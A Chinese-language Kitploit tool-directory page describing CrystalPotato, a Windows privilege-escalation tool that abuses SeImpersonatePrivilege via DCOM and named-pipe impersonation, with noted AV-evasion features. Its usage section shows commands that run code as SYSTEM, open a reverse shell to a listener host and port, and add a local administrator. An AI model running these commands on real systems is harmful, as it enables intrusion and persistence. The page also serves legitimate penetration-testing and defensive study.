Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CrystalPotato — GodPotato 的 Crystal 移植版,通过间接系统调用、动态 API 解析和编译时字符串混淆来滥用 SeImpersonatePrivilege。可运行命令、反弹 Shell 或添加用户。 | Kitploit
工具/GitHubGitHub/ricardojoserf/crystalpotato
权限提升漏洞利用后渗透利用渗透测试红队对抗性攻击
GitHubricardojoserf/crystalpotato

CrystalPotato

GodPotato 的 Crystal 移植版,通过间接系统调用、动态 API 解析和编译时字符串混淆来滥用 SeImpersonatePrivilege。可运行命令、反弹 Shell 或添加用户。

查看仓库
81天前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
网站

CrystalPotato

GodPotato 的 Crystal 移植版本,一种通过滥用 DCOM OXID Resolver 和命名管道模拟,从具有 SeImpersonatePrivilege 权限的账户本地提权至 SYSTEM 的工具。

Windows API 在运行时动态解析,并通过间接系统调用存根调用;所有字符串在编译时进行 XOR 混淆,默认情况下仅打印命令输出。已在 Windows 10、11 和 Server 2025 上测试。

CrystalPotato

构建

CrystalPotato 使用 Windows 上的 Crystal 编译为单个无依赖文件:

root@kitploit:~
crystal build CrystalPotato.cr -o CrystalPotato.exe --release --static

用法

执行命令、启动反向 shell,或创建本地管理员。

root@kitploit:~
CrystalPotato.exe -c <COMMAND>
CrystalPotato.exe -H <LHOST> -P <LPORT> [-c <SHELL>]
CrystalPotato.exe -u <USER> -pw <PASS>
标志说明
-c CMD要以 SYSTEM 身份执行的命令或用于反向 shell 的 shell(默认:cmd.exe)
-H HOST反向 shell 监听主机
-P PORT反向 shell 监听端口
-u USER创建本地管理员 - 用户名
-pw PASS创建本地管理员 - 密码
-p NAME自定义管道名称(默认:Crystal)
-d调试输出
-dd完整跟踪
-h显示帮助

img2

来源

  • GodPotato - 由 BeichenDream 编写的原始 C# 实现。

  • RustPotato - 由 safedv 编写的 Rust 实现。

  • SigmaPotato - 由 tylerdotrar 编写的具有额外功能的 C# 实现。

下载工具